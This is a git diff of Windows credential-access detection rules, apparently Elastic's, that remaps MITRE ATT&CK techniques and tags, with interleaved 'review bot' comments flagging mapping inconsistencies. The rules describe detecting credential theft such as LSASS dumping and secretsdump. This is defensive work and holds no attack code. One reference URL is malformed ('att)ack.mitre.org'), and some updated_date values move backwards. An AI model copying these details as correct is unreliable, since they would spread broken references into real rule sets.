@@ -140,16 +140,40 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
index c5883618cf0..bb46707c121 100644
--- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
+++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/04/30"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
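Review bot: The new TA0002 Execution `[[rule.threat]]` entry has no counterpart in this file's `tags` as far as the patch shows: there is no tags hunk for `credential_access_posh_veeam_sql.toml`, so unless `"Tactic: Execution"` is already present the tags and threat mapping diverge and a tags-vs-`rule.threat` consistency check would flag the missing tag; please confirm against the file. The same situation — a new tactic entry without a matching tags change — appears in `credential_access_suspicious_lsass_access_memdump.toml` (TA0002), `credential_access_veeam_backup_dll_imageload.toml` (TA0002) and `credential_access_wbadmin_ntds.toml` (TA0005). Three blank `+` lines are also inserted between the `T1059.001` subtechnique and the new `[rule.threat.tactic]`, more than the single blank the surrounding tables use.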
@@ -68,7 +68,21 @@ references = [
 risk_score = 73
 rule_id = "4682fd2c-cfae-47ed-a543-9bed37657aa6"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -86,13 +100,31 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1187"
-name = "Forced Authentication"
-reference = "https://attack.mitre.org/techniques/T1187/"
+id = "T1212"
+name = "Exploitation for Credential Access"
+reference = "https://attack.mitre.org/techniques/T1212/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+[[rule.threat.technique.subtechnique]]
+id = "T1218.011"
+name = "Rundll32"
+reference = "https://attack.mitre.org/techniques/T1218/011/"
+
+
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
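Review bot: Replacing `T1187` Forced Authentication with `T1212` Exploitation for Credential Access removes the technique that most directly describes coercing a host into authenticating to an attacker-controlled endpoint, which — judging by the file name and the removed mapping — is what this rule's spooler/NTLM-relay detection is about; `T1212` describes exploiting a software vulnerability to obtain credentials, at best a partial fit. Consider keeping `T1187` in the Credential Access entry alongside or instead of `T1212`. The added Defense Evasion entry (`T1218.011` Rundll32) and the `"Tactic: Defense Evasion"` tag in the preceding hunk are consistent with each other; the query that would justify the Rundll32 mapping is outside this hunk.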
diff --git a/rules/windows/credential_access_remote_sam_secretsdump.toml b/rules/windows/credential_access_remote_sam_secretsdump.toml
index 96822ab9c0a..f3fde2b0828 100644
--- a/rules/windows/credential_access_remote_sam_secretsdump.toml
+++ b/rules/windows/credential_access_remote_sam_secretsdump.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/03/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2024/05/21"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,15 @@ Hence for this rule to work effectively, users will need to add a custom ingest
 For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Defend"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Lateral Movement",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -81,18 +89,31 @@ file where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1003.002"
 name = "Security Account Manager"
 reference = "https://attack.mitre.org/techniques/T1003/002/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
+
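Review bot: The added `"Tactic: Lateral Movement"` tag is placed before `"Tactic: Credential Access"`, whereas `rule.threat` in the next hunk keeps Credential Access as its first entry and the other files in this patch append the new tactic after the existing one; ordering tags to follow the `rule.threat` order keeps the two lists easy to compare. The same reversed order appears in `credential_access_suspicious_winreg_access_via_sebackup_priv.toml`. The threat hunk also ends with an added blank line after the final `reference`, leaving a trailing empty line at end of file.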
diff --git a/rules/windows/credential_access_saved_creds_vault_winlog.toml b/rules/windows/credential_access_saved_creds_vault_winlog.toml
index 6435dd1f66a..2b62541ede2 100644
--- a/rules/windows/credential_access_saved_creds_vault_winlog.toml
+++ b/rules/windows/credential_access_saved_creds_vault_winlog.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/08/30"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -87,18 +87,24 @@ sequence by winlog.computer_name, winlog.process.pid with maxspan=1s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1555.004"
 name = "Windows Credential Manager"
 reference = "https://attack.mitre.org/techniques/T1555/004/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/windows/credential_access_saved_creds_vaultcmd.toml b/rules/windows/credential_access_saved_creds_vaultcmd.toml
index 7e05143b527..bcb205d1e7a 100644
--- a/rules/windows/credential_access_saved_creds_vaultcmd.toml
+++ b/rules/windows/credential_access_saved_creds_vaultcmd.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/19"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -94,18 +94,24 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1555.004"
 name = "Windows Credential Manager"
 reference = "https://attack.mitre.org/techniques/T1555/004/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
index 93a9e7334eb..6746281b95d 100644
--- a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
+++ b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/27"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -75,7 +75,17 @@ Audit Authorization Policy Change (Success,Failure)
 ```
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Tactic: Persistence",
+ "Data Source: Active Directory",
+ "Resources: Investigation Guide",
+ "Use Case: Active Directory Monitoring",
+ "Data Source: Windows Security Event Logs",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -86,26 +96,26 @@ event.code:4704 and host.os.type:"windows" and winlog.event_data.PrivilegeList:"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1558"
+name = "Steal or Forge Kerberos Tickets"
+reference = "https://attack.mitre.org/techniques/T1558/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml
index 8d7dfb8c6b0..f2acb0609bf 100644
--- a/rules/windows/credential_access_shadow_credentials.toml
+++ b/rules/windows/credential_access_shadow_credentials.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/26"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W
 ```
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Data Source: Active Directory",
+ "Resources: Investigation Guide",
+ "Use Case: Active Directory Monitoring",
+ "Data Source: Windows Security Event Logs",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -98,26 +107,14 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml
index 756dc3f5d77..f7b5e02f1bd 100644
--- a/rules/windows/credential_access_spn_attribute_modified.toml
+++ b/rules/windows/credential_access_spn_attribute_modified.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/22"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -84,7 +84,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W
 ```
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Data Source: Active Directory",
+ "Resources: Investigation Guide",
+ "Use Case: Active Directory Monitoring",
+ "Data Source: Windows Security Event Logs",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -97,13 +106,19 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.OperationType:"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1558"
+name = "Steal or Forge Kerberos Tickets"
+reference = "https://attack.mitre.org/techniques/T1558/"
+[[rule.threat.technique.subtechnique]]
+id = "T1558.003"
+name = "Kerberoasting"
+reference = "https://attack.mitre.org/techniques/T1558/003/"
+
+
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
index 94f860c2038..53f21c1ebca 100644
--- a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
+++ b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/07"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -96,18 +96,31 @@ process where host.os.type == "windows" and event.code == "10" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1003.001"
 name = "LSASS Memory"
 reference = "https://attack.mitre.org/techniques/T1003/001/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
index 5fe01b915f7..e63eabdab29 100644
--- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
+++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/16"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -82,7 +82,17 @@ Special Logon (Success)
 ```
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Lateral Movement",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+ "Use Case: Active Directory Monitoring",
+ "Data Source: Active Directory",
+ "Data Source: Windows Security Event Logs",
+]
 type = "eql"
 query = '''
@@ -98,18 +108,36 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1003.002"
 name = "Security Account Manager"
 reference = "https://attack.mitre.org/techniques/T1003/002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1003.004"
+name = "LSA Secrets"
+reference = "https://attack.mitre.org/techniques/T1003/004/"
+
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
+
diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
index 0e658d8cb0b..a019bfa0a69 100644
--- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
+++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/12/25"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -93,7 +93,20 @@ This event will only trigger if symbolic links are created from a new process sp
 Direct access to a shell and calling symbolic link creation tools will not generate an event matching this rule.
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -111,26 +124,24 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+[[rule.threat.technique.subtechnique]]
+id = "T1003.002"
+name = "Security Account Manager"
+reference = "https://attack.mitre.org/techniques/T1003/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1003.003"
+name = "NTDS"
+reference = "https://attack.mitre.org/techniques/T1003/003/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1006"
-name = "Direct Volume Access"
-reference = "https://attack.mitre.org/techniques/T1006/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/windows/credential_access_veeam_backup_dll_imageload.toml b/rules/windows/credential_access_veeam_backup_dll_imageload.toml
index a78053119d7..0af9521613a 100644
--- a/rules/windows/credential_access_veeam_backup_dll_imageload.toml
+++ b/rules/windows/credential_access_veeam_backup_dll_imageload.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 [rule]
 author = ["Elastic"]
@@ -77,13 +77,36 @@ Veeam Backup software is crucial for data protection, enabling secure backup and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/credential_access_veeam_commands.toml b/rules/windows/credential_access_veeam_commands.toml
index b6b0c4da319..26d95dd353c 100644
--- a/rules/windows/credential_access_veeam_commands.toml
+++ b/rules/windows/credential_access_veeam_commands.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/14"
 integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,21 @@ references = ["https://thedfirreport.com/2021/12/13/diavol-ransomware/"]
 risk_score = 47
 rule_id = "b661f86d-1c23-4ce7-a59e-2edbdba28247"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Credential Access",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -80,13 +94,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://att)ack.mitre.org/techniques/T1555/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
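Review bot: The tags hunk adds `"Tactic: Defense Evasion"`, but the threat hunk that follows in this file adds a TA0002 Execution entry (`T1059.001` PowerShell) and no Defense Evasion entry, so the new tag is orphaned and `Tactic: Execution` is missing; a tags-vs-`rule.threat` consistency check would report both. Change the tag to `"Tactic: Execution",` (ideally placed after `"Tactic: Credential Access",`) or add the Defense Evasion technique that was intended to `rule.threat`.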
diff --git a/rules/windows/credential_access_wbadmin_ntds.toml b/rules/windows/credential_access_wbadmin_ntds.toml
index 159f6ad96c9..d8e4b5920ef 100644
--- a/rules/windows/credential_access_wbadmin_ntds.toml
+++ b/rules/windows/credential_access_wbadmin_ntds.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/05"
 integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -89,18 +89,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+[[rule.threat.technique.subtechnique]]
+id = "T1003.002"
+name = "Security Account Manager"
+reference = "https://attack.mitre.org/techniques/T1003/002/"
 [[rule.threat.technique.subtechnique]]
 id = "T1003.003"
 name = "NTDS"
 reference = "https://attack.mitre.org/techniques/T1003/003/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1006"
+name = "Direct Volume Access"
+reference = "https://attack.mitre.org/techniques/T1006/"
+
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml
index f4cc7db11aa..e8bd3d77a6c 100644
--- a/rules/windows/credential_access_web_config_file_access.toml
+++ b/rules/windows/credential_access_web_config_file_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/19"
 [rule]
 author = ["Elastic"]
@@ -55,7 +55,14 @@ references = [
 risk_score = 73
 rule_id = "5841b80f-a1f8-4c00-a966-d2cc4a7a82e4"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -72,34 +79,18 @@ event.category:file and host.os.type:windows and event.action:open and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
 [rule.threat.tactic]
